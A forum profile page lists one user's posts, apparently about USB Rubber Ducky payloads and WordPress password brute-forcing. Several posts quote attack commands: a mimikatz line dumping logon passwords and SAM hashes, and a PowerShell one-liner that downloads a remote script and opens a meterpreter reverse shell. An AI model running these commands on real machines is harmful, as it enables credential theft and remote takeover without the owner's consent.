Jump to content

hzm74

Active Members
  • Posts

    22
  • Joined

  • Last visited

Recent Profile Visitors

910 profile views

hzm74's Achievements

Newbie

Newbie (1/14)

  1. Hello, Yesterday I tried this tool called wpscan on kali. It is a scanner that scans a website build with Wordpress. It can scan for user-names. After that with the help of a wordlist you can try to bruteforce the passwords for these users. But I find it not to be very fast. Now I'm thinking if it is possible to use another tool like hashcat to do the bruteforcing. Like piping hashcat output to wpscan. Does anyone know if this is possible or does know another way to speed things up. Thnx, just hoping to learn here!
  2. Hello, I wanted to test the script. But the downloadlink doesn't host the script anymore?! Can you post a new link? Thnx in advanced.
  3. Hello, Had the same problem. This is the solution: In the inject.bin script type after the " character TWO spaces. With a real keyboard the " character also displays only after pressing the space button. HzM74
  4. This gives me following error: mimikatz(commandline) # privilege::debug"sekurlsa::logonPasswordssamdump::hashes ERROR mimikatz_doLocal ; "debug"sekurlsa::logonPasswordssamdump::hashes" command of "privilege" module not found ! Module : privilege Full name : Privilege module debug - Ask debug privilege LOOK AT: ::logonPasswordssamdump I have missing spaces in my commandline. This line: STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt doesn't create spaces in the commandline between debug" "sekurlsa and full" "samdump PLEASE HELP. Seems simple?!
  5. Hello, Can you explain a little bit more how all the included files work together?! What to do to get it work? Do I have to run compiler.bat manually? Do I have to run it to configure the payload (inject.bin)? When I wan't to run the payload, do I need to plugin an extra usb named "JUNK" to get the info copied to this drive? YOU SHOULD EDIT THE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS. <- What exactly do I need to edit? Thnx. A little step by step tutorial would help. HzM74
  6. I can confirm it works when tested machine is logged in as an admin. Will try now with user account.
  7. solved it by adding a space after the ". I have US-international. But, problem solved.
  8. Hello, These are the "red"-lines i'm getting: C:\Users\*****>powershell ÏEX (New-Object Net.WebClient).DownloadString('http:/ /bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https - Lhost 192.168.3.109 -Lport 8080 -Force" The term 'ÏEX' is not recognized as the name of a cmdlet, function, script file , or operable program. Check the spelling of the name, or if a path was include d, verify that the path is correct and try again. At line:1 char:4 + ÏEX <<<< (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.3.1 09 -Lport 8080 -Force + CategoryInfo : ObjectNotFound: (ÏEX:String) [], CommandNotFound Exception + FullyQualifiedErrorId : CommandNotFoundException The term 'Invoke-Shellcode' is not recognized as the name of a cmdlet, function , script file, or operable program. Check the spelling of the name, or if a pat h was included, verify that the path is correct and try again. At line:1 char:89 + ÏEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invok e-Shellcode <<<< -Payload windows/meterpreter/reverse_https -Lhost 192.168.3.1 09 -Lport 8080 -Force + CategoryInfo : ObjectNotFound: (Invoke-Shellcode:String) [], Co mmandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException Thnx !! I believe it is the following: 'IEX' is changed to 'ÏEX' This might be a keyboard language problem? Any help suggestions?
  9. So the target machine needs to be logged in as an admin to let this work?
  10. I too have the red tekst in the command screen. Other question: does the attacked computer needs to be logged in as an admin to let this work? Thnx
  11. Is it possible with standard user account to creatie a meterpreter session? Thnx
  12. Thnx. With you're information I realize that I don't need to alter my keyboard mappings. In The Netherlands we use US-international. This is no different than US.\ other than some extra key-functions. I now placed a longer delay in my script en the ducky works fine now. No random programs are opened anymore. One off-topic question: Is my conclusion wright that with many of the available scripts you need to be logged in as admin-user? When logged in as "normal"-user for example I can't let the Ducky write to the windows directory, even when I run it as admin. This limits the use of the ducky al lot in my opinion. THNX HzM74
  13. Thnx. But now i have a problem. When i type my control-key, alt-key etc in hubdog no hex code is dislayed. How do i discover the hex keys for my modifykeys?
  14. Hello, thnx for reply. Is this the way i should look at it? : There is a keyboard.properties file. In this file all keys which exist on a keyboard are numbered. For example KEY_A = 4 (this means the letter 'A' is given a number '4'). KEY_ESC=41 Then there is the custom properties-file (for example be.properties). In this file the ascii keys from the keyboard you are using are remapped to the keyboard.properties file. So i use busdog to scan my keyboard-keys, for example when i type the "escape" button in busdog the hex-code 29 shows up. To make my custom properties file i do the following (the escape-key as example): ASCII_29 = KEY_ESCAPE Is this the way to make my custom file for my keyboard? : ASCII_3a = KEY_F1 ASCII_29 = KEY_ESCAPE etc etc etc Thnx in advanced!!
×
×
  • Create New...